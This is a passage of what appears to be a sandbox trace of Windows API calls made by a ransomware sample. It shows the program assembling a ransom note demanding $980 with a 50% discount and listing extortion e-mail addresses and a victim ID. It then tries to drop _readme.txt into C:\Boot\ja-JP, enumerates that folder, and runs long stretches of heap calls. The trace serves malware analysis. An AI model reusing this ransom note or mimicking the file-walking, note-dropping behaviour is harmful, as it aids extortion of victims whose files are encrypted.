$980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.553] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.553] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.553] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.553] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.553] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.553] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.553] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.554] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.560] RtlAllocateHeap (HeapHandle=0x630000, 